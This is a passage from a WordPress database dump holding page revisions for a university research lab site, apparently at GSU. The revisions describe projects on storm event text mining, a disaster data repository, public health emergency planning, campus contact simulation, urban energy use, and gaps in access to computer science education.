gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">ORPHEUS</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:14:23','2023-09-29 15:14:23','',126,'https://gsudice.dataconn.net/?p=1535',0,'revision','',0),(1541,1,'2023-09-29 11:15:56','2023-09-29 15:15:56','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-2.jpg','cropped-tornado-2.jpg','','inherit','open','closed','','cropped-tornado-2-jpg','','','2023-09-29 11:15:56','2023-09-29 15:15:56','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-2.jpg',0,'attachment','image/jpeg',0),(1542,1,'2023-09-29 11:16:20','2023-09-29 15:16:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:16:20','2023-09-29 15:16:20','',438,'https://gsudice.dataconn.net/?p=1542',0,'revision','',0),(1543,1,'2023-09-29 11:16:20','2023-09-29 15:16:20','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n 